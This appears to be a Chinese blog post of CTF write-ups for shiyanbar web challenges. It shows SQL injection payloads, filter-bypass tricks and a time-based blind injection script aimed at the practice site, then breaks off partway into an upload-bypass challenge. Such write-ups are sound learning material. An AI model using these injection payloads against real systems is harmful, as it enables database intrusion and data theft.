<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF,writeup," />





  <link rel="alternate" href="/atom.xml" title="iSky0t's Notes" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.2" />






<meta name="description" content="最近想参加CTF的比赛，于是国庆放假做一下实验吧的web部分题目 并简单做个记录，并非完全是自己的writeup吧 和别人共同讨论吧！">
<meta name="keywords" content="CTF,writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="shiyanbar-writeup">
<meta property="og:url" content="https://isky0t.github.io/2017/10/02/shiyanbar-writeup/index.html">
<meta property="og:site_name" content="iSky0t&#39;s Notes">
<meta property="og:description" content="最近想参加CTF的比赛，于是国庆放假做一下实验吧的web部分题目 并简单做个记录，并非完全是自己的writeup吧 和别人共同讨论吧！">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar01sql.png">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar02user.png">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar03flag.png">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar04group.png">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar05sqleasy.png">
<meta property="og:image" content="http://ctf5.shiyanbar.com/web/web200.jpg">
<meta property="og:image" content="https://isky0t.github.io/images/shiyanbar06false.png">
<meta property="og:updated_time" content="2017-10-05T12:30:19.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="shiyanbar-writeup">
<meta name="twitter:description" content="最近想参加CTF的比赛，于是国庆放假做一下实验吧的web部分题目 并简单做个记录，并非完全是自己的writeup吧 和别人共同讨论吧！">
<meta name="twitter:image" content="https://isky0t.github.io/images/shiyanbar01sql.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.2',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://isky0t.github.io/2017/10/02/shiyanbar-writeup/"/>





  <title>shiyanbar-writeup | iSky0t's Notes</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">iSky0t's Notes</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://isky0t.github.io/2017/10/02/shiyanbar-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="iSky0t">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="iSky0t's Notes">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">shiyanbar-writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-10-02T15:49:09+08:00">
                2017-10-02
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/writeup-web/" itemprop="url" rel="index">
                    <span itemprop="name">writeup-web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          

          
          
             <span id="/2017/10/02/shiyanbar-writeup/" class="leancloud_visitors" data-flag-title="shiyanbar-writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近想参加CTF的比赛，于是国庆放假做一下实验吧的web部分题目 并简单做个记录，并非完全是自己的writeup吧 和别人共同讨论吧！<br><a id="more"></a></p>
<h2 id="登陆一下好吗"><a href="#登陆一下好吗" class="headerlink" title="登陆一下好吗??"></a>登陆一下好吗??</h2><blockquote>
<p>不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!</p>
</blockquote>
<p>题干给出这些提示，尝试一些注入关键字<br><code>union</code>、<code>or</code>、<code>||</code>、<code>select</code>、<code>#</code>、<code>--</code>、<code>//</code> 等等这些字符均被过滤 大小写无用<br>但是<code>&#39;</code>并未过滤 初步认为这应该不是一个寻常的SQL注入题吧？猜测SQL语句应该为</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">"$_POST['u']"</span> <span class="keyword">and</span> <span class="keyword">password</span>=<span class="string">"$_POST['p']"</span></div></pre></td></tr></table></figure>
<p>而后和朋友讨论后  得出 </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> username=<span class="string">''</span>=<span class="string">''</span> <span class="keyword">and</span> <span class="keyword">password</span>=<span class="string">''</span>=<span class="string">''</span></div></pre></td></tr></table></figure>
<p>其实语句就变成了这样</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">admin</span> <span class="keyword">where</span> <span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span></div></pre></td></tr></table></figure>
<p>提交<code>&#39;=&#39;</code>后得flag，并显示所有的username和password</p>
<h2 id="who-are-you"><a href="#who-are-you" class="headerlink" title="who are you?"></a>who are you?</h2><blockquote>
<p>我要把攻击我的人都记录db中去!</p>
</blockquote>
<p>打开页面显示 <strong><em>your ip is :x.x.x.x</em></strong></p>
<p>初步猜测后端代码获取访问者的ip并插入到数据库中，于是尝试修改提交header中的xff字段注入</p>
<p><img src="/images/shiyanbar01sql.png" alt="sql test"></p>
<p>经过测试发现存在注入，和猜测的没错，只不过这里不能用<code>if(expr1,expr2,expr3)</code>函数，因为遇到<code>,</code>就断了。应该是和insert中的冲突了吧，于是只能用两个and来判断 ，决定尝试写个Python跑一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding: utf-8</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> time</div><div class="line"><span class="keyword">import</span> urllib2</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">Main</span><span class="params">()</span>:</span></div><div class="line">    url = <span class="string">"http://ctf5.shiyanbar.com/web/wonderkun/index.php"</span></div><div class="line">    payloads = <span class="string">'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'</span>  <span class="comment"># 所有的字符串</span></div><div class="line">    result = <span class="string">''</span>  <span class="comment"># 存放结果</span></div><div class="line">    <span class="keyword">print</span> <span class="string">'Start to SQL test:'</span></div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">33</span>):</div><div class="line">        <span class="keyword">for</span> payload <span class="keyword">in</span> payloads:</div><div class="line">            startTime = time.time()</div><div class="line">            sql = <span class="string">"1.1.1.1' and (select user() like '"</span> + result + payload + <span class="string">"%') and sleep(5) and '1'='1"</span></div><div class="line">            sql2 = <span class="string">"1.1.1.1' and (select database() like '"</span> + result + payload + <span class="string">"%') and sleep(5) and '1'='1"</span></div><div class="line">            sql3 = <span class="string">"1.1.1.1' and (select case when substring((select table_name from information_schema.tables where table_schema='web4' limit 1 offset 1) from "</span>+str(i)+<span class="string">" for 1)='"</span>+payload+<span class="string">"' then sleep(5) else 0 end ) and '1'='1"</span></div><div class="line">            sql4 = <span class="string">"1.1.1.1' and (select case when substring((select flag from flag) from "</span>+str(i)+<span class="string">" for 1)='"</span>+payload+<span class="string">"' then sleep(5) else 0 end ) and '1'='1"</span></div><div class="line">            req = urllib2.Request(url)</div><div class="line">            req.add_header(<span class="string">'x-forwarded-for'</span>, sql4)</div><div class="line">            f = urllib2.urlopen(req)</div><div class="line">            <span class="keyword">if</span> (time.time() - startTime &gt; <span class="number">5</span>):</div><div class="line">                result += payload</div><div class="line">                <span class="keyword">print</span> <span class="string">"tablename is "</span> + str(i) + <span class="string">": "</span> + result</div><div class="line">                <span class="keyword">break</span></div><div class="line">                <span class="comment"># print f.read()</span></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">pass</span></div></pre></td></tr></table></figure>
<p><img src="/images/shiyanbar02user.png" alt="user result"></p>
<p>根据同样办法注入得到database为web4，但是无法用<code>,</code> 查找资料<a href="https://dev.mysql.com/doc/refman/5.7/en/string-functions.html#function_substring" target="_blank" rel="external">Mysql手册</a>得到无需使用逗号substr和mid的方法</p>
<h3 id="不使用逗号"><a href="#不使用逗号" class="headerlink" title="不使用逗号"></a>不使用逗号</h3><p>基于时间的盲注：case when xxx then sleep() else xxxx;</p>
<p>对于substr和mid:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">substr(data from 1 for 1);</div><div class="line">mid(data from 1 for 1);</div></pre></td></tr></table></figure>
<p>根据这个手法手工和脚本一起使用</p>
<ol>
<li><p>先获取表段数 结果为2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">1.1.1.1&apos; and (select case when (select count(*) from information_schema.tables where table_schema=&apos;web4&apos;)=2 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div></pre></td></tr></table></figure>
</li>
<li><p>获取第一个表段名的长度 长度为9，第二个表段长度为4（猜测是flag）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">1.1.1.1&apos; and (select case when length((select table_name from information_schema.tables where table_schema=&apos;web4&apos; limit 1 offset 0))=9 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div><div class="line">1.1.1.1&apos; and (select case when length((select table_name from information_schema.tables where table_schema=&apos;web4&apos; limit 1 offset 1))=4 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div></pre></td></tr></table></figure>
</li>
<li><p>利用脚本跑出表段名字 第一个字段名为<strong>client_ip</strong> 第二个字段名为<strong>flag</strong></p>
</li>
<li>获取<strong>flag</strong>表段中字段的数量、长度和内容<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">字段数为1</div><div class="line">1.1.1.1&apos; and (select case when (select count(column_name) from information_schema.columns where table_name=&apos;flag&apos; and table_schema=&apos;web4&apos;)=1 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div><div class="line">字段名长为4</div><div class="line">1.1.1.1&apos; and (select case when length((select column_name from information_schema.columns where table_name=&apos;flag&apos; and table_schema=&apos;web4&apos;))=4 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div><div class="line">猜测字段名为flag 结果正确</div><div class="line">1.1.1.1&apos; and (select case when substring((select column_name from information_schema.columns where table_name=&apos;flag&apos; and table_schema=&apos;web4&apos;) from 1 for 4)=&apos;flag&apos; then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div><div class="line">先获取内容长度为32  再用脚本跑出flag为cdbf14c9551d5be5612f7bb5d2867853</div><div class="line">1.1.1.1&apos; and (select case when length((select flag from flag))=32 then sleep(1) else 0 end ) and &apos;1&apos;=&apos;1</div></pre></td></tr></table></figure>
</li>
</ol>
<p><img src="/images/shiyanbar03flag.png" alt="flag"></p>
<h2 id="因缺思汀的绕过"><a href="#因缺思汀的绕过" class="headerlink" title="因缺思汀的绕过"></a>因缺思汀的绕过</h2><blockquote>
<p>访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码，请求，响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入，XSS等相关知识。涉及方向较多。此题主要涉及源码审计，MySQL相关的知识。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"></div><div class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'pwd'</span>])) &#123;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;form action="" method="post"&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input name="uname" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input name="pwd" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;input type="submit" /&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;/form&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">	<span class="keyword">echo</span> <span class="string">'&lt;!--source: source.txt--&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">die</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">AttackFilter</span><span class="params">($StrKey,$StrValue,$ArrReq)</span></span>&#123;  </div><div class="line">    <span class="keyword">if</span> (is_array($StrValue))&#123;</div><div class="line">        $StrValue=implode($StrValue);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/"</span>.$ArrReq.<span class="string">"/is"</span>,$StrValue)==<span class="number">1</span>)&#123;   </div><div class="line">        <span class="keyword">print</span> <span class="string">"水可载舟，亦可赛艇！"</span>;</div><div class="line">        <span class="keyword">exit</span>();</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$filter = <span class="string">"and|select|from|where|union|join|sleep|benchmark|,|\(|\)"</span>;</div><div class="line"><span class="keyword">foreach</span>($_POST <span class="keyword">as</span> $key=&gt;$value)&#123; </div><div class="line">    AttackFilter($key,$value,$filter);</div><div class="line">&#125;</div><div class="line"></div><div class="line">$con = mysql_connect(<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>);</div><div class="line"><span class="keyword">if</span> (!$con)&#123;</div><div class="line">	<span class="keyword">die</span>(<span class="string">'Could not connect: '</span> . mysql_error());</div><div class="line">&#125;</div><div class="line">$db=<span class="string">"XXXXXX"</span>;</div><div class="line">mysql_select_db($db, $con);</div><div class="line">$sql=<span class="string">"SELECT * FROM interest WHERE uname = '&#123;$_POST['uname']&#125;'"</span>;</div><div class="line">$query = mysql_query($sql); </div><div class="line"><span class="keyword">if</span> (mysql_num_rows($query) == <span class="number">1</span>) &#123; </div><div class="line">    $key = mysql_fetch_array($query);</div><div class="line">    <span class="keyword">if</span>($key[<span class="string">'pwd'</span>] == $_POST[<span class="string">'pwd'</span>]) &#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"CTF&#123;XXXXXX&#125;"</span>;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"亦可赛艇！"</span>;</div><div class="line">    &#125;</div><div class="line">&#125;<span class="keyword">else</span>&#123;</div><div class="line">	<span class="keyword">print</span> <span class="string">"一颗赛艇！"</span>;</div><div class="line">&#125;</div><div class="line">mysql_close($con);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>简单说明：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">preg_match(string $pattern , string $subject)</div><div class="line">匹配字符串 /i不区分大小写 返回值有int(0)未匹配到 int(1)匹配到 和false匹配错误</div></pre></td></tr></table></figure></p>
<p>大致思路：首先看过滤的关键字，那就没办法用<code>union</code>联合查询一个可控的pwd。那就把希望寄托于将<code>$key[&#39;pwd&#39;]==$_POST[&#39;pwd&#39;]</code> 构造成<code>null=null</code>的等式 ，查询资料后得到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">group by with rollup </div><div class="line">对某个字段汇总（聚合）新增的一条记录字段本身内容为NULL</div></pre></td></tr></table></figure></p>
<p><img src="/images/shiyanbar04group.png" alt="group by with rollup"><br>构造提交payload<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">uname=&apos; or 1=1 group by pwd with rollup limit 1 offset 2 #&amp;pwd=</div></pre></td></tr></table></figure></p>
<h2 id="简单的sql注入"><a href="#简单的sql注入" class="headerlink" title="简单的sql注入"></a>简单的sql注入</h2><blockquote>
<p>到底过滤了什么东西？通过注入获得flag值（提交格式：flag{}）</p>
</blockquote>
<p>简单测试过滤了<code>and select union from where # -- informaction</code>等关键词<br>使用<code>/*!select*/</code>这样的MySQL特性绕过<br>构造payload得<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">1111&apos;  /*!union*/ /*!select*/ flag /*!from*/ flag /*!where*/ &apos;1&apos;=&apos;1</div></pre></td></tr></table></figure></p>
<p><img src="/images/shiyanbar05sqleasy.png" alt="easy sql"></p>
<h2 id="简单的sql注入2"><a href="#简单的sql注入2" class="headerlink" title="简单的sql注入2"></a>简单的sql注入2</h2><blockquote>
<p>有回显的mysql注入</p>
</blockquote>
<p>简单测试后发现提交有空格就会爆<code>SQLi detected!</code><br>于是用<code>/**/</code>来替换空格<br>构造payload得（就是在上一关的基础上替换了空格）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">1&apos;/**//*!union*//**//*!select*//**/flag/**//*!from*//**/flag/**//*!where*//**/&apos;1&apos;=&apos;1</div></pre></td></tr></table></figure></p>
<p>得到flag发现和上一关是一样的？？？！！</p>
<h2 id="简单的sql注入3"><a href="#简单的sql注入3" class="headerlink" title="简单的sql注入3"></a>简单的sql注入3</h2><blockquote>
<p>mysql报错注入</p>
</blockquote>
<p>简单测试后发现 <code>floor updatexml extractvalue</code>这几个关键词被过滤，于是寻找其他函数，找到一篇资料<a href="http://www.cnblogs.com/wocalieshenmegui/p/5917967.html" target="_blank" rel="external">十种MySQL报错注入</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div></pre></td><td class="code"><pre><div class="line">1.floor()</div><div class="line">select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);</div><div class="line"></div><div class="line">2.extractvalue()</div><div class="line">select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));</div><div class="line"></div><div class="line">3.updatexml()</div><div class="line">select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));</div><div class="line"></div><div class="line">4.geometrycollection()</div><div class="line">select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">5.multipoint()</div><div class="line">select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">6.polygon()</div><div class="line">select * from test where id=1 and polygon((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">7.multipolygon()</div><div class="line">select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">8.linestring()</div><div class="line">select * from test where id=1 and linestring((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">9.multilinestring()</div><div class="line">select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));</div><div class="line"></div><div class="line">10.exp()</div><div class="line">select * from test where id=1 and exp(~(select * from(select user())a));</div></pre></td></tr></table></figure></p>
<p>于是挑选一个后提交payload，得到flag，我擦？还是和上两关一样？？？！！<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">1&apos; and geometrycollection((select * from(select * from(select flag from flag)a)b))%23</div></pre></td></tr></table></figure></p>
<h2 id="天下武功唯快不破"><a href="#天下武功唯快不破" class="headerlink" title="天下武功唯快不破"></a>天下武功唯快不破</h2><blockquote>
<p>看看响应头</p>
</blockquote>
<p>从题干信息中得知查看响应头 发现<code>FLAG:UDBTVF9USElTX1QwX0NINE5HRV9GTDRHOjh3bHVoNXFXeQ==</code> 拿去base64解码后得<code>P0ST_THIS_T0_CH4NGE_FL4G:hjlqfHs77</code><br>打开页面显示的是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">There is no martial art is indefectible, while the fastest speed is the only way for long success.</div><div class="line">&gt;&gt;&gt;&gt;&gt;&gt;----You must do it as fast as you can!----&lt;&lt;&lt;&lt;&lt;&lt;</div></pre></td></tr></table></figure></p>
<p>应该是将flag解码后作为内容部分，而key作为参数名，重新提交到这个页面，于是写了个Python得到flag<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!/usr/bin/env python</span></div><div class="line"><span class="comment"># encoding: utf-8</span></div><div class="line"></div><div class="line"><span class="string">"""</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">@author: iSky0t</span></div><div class="line"><span class="string">@time: 2017/10/4 09:16</span></div><div class="line"><span class="string">"""</span></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">import</span> requests</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">Main</span><span class="params">()</span>:</span></div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">20</span>):</div><div class="line"></div><div class="line">        url = <span class="string">"http://ctf5.shiyanbar.com/web/10/10.php"</span></div><div class="line">        req = requests.get(url)</div><div class="line">        flag = req.headers[<span class="string">'FLAG'</span>].decode(<span class="string">'base64'</span>).split(<span class="string">':'</span>)[<span class="number">1</span>]</div><div class="line">        <span class="keyword">print</span> flag</div><div class="line">        payload = &#123;<span class="string">'key'</span>:flag&#125;</div><div class="line">        req = requests.post(url,data=payload)</div><div class="line">        <span class="keyword">print</span> req.text</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</div><div class="line">    <span class="keyword">pass</span></div></pre></td></tr></table></figure></p>
<h2 id="上传绕过"><a href="#上传绕过" class="headerlink" title="上传绕过"></a>上传绕过</h2><blockquote>
<p>bypass the upload</p>
</blockquote>
<figure class="highlight http"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">------WebKitFormBoundaryb3B5YtJ0XKn1kEpP</div><div class="line"><span class="attribute">Content-Disposition</span>: form-data; name="dir"</div><div class="line"></div><div class="line">/uploads/</div><div class="line">------WebKitFormBoundaryb3B5YtJ0XKn1kEpP</div><div class="line"><span class="attribute">Content-Disposition</span>: form-data; name="file"; filename="y.jpg"</div><div class="line"><span class="attribute">Content-Type</span>: image/vnd.microsoft.icon</div></pre></td></tr></table></figure>
<p>在上传包中发现有dir的参数，先提交正确上传</p>
<blockquote>
